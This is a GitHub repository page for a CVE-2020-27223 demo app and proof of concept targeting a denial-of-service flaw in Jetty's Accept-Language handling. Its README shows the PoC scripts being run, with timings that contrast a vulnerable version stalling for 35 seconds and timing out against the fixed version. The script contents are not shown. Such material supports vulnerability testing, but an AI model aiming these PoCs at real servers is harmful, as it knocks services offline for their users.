Skip to content

motikan2010/CVE-2020-27223

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
.mvn/wrapper
.mvn/wrapper
 
 
poc
poc
 
 
src/main
src/main
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
mvnw
mvnw
 
 
mvnw.cmd
mvnw.cmd
 
 
pom.xml
pom.xml
 
 

Repository files navigation

CVE-2020-27223

Using

$ mvn spring-boot:run

9.4.36.v20210114

$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"58,557","accept_language":"aab"}
real	0m0.093s 🐇
user	0m0.006s
sys	0m0.007s
{"time_ns":"18,461,763,438","accept_language":"ahn"}
real	0m35.339s 🐢
user	0m0.006s
sys	0m0.006s

9.4.37.v20210219 (Fixed)

$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"36,675","accept_language":"aab"}
real	0m0.023s 🐇
user	0m0.005s
sys	0m0.007s
{"time_ns":"1,265,004","accept_language":"ahn"}
real	0m0.024s 🐇
user	0m0.006s
sys	0m0.006s

PoC

$ ./poc/cve-2020-27223-poc2.sh
curl: (28) Operation timed out after 120000 milliseconds with 0 bytes received

real	2m0.025s
user	0m0.016s
sys	0m0.009s

References

About

CVE-2020-27223 Vulnerability App & PoC

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

0 forks
Report repository

Languages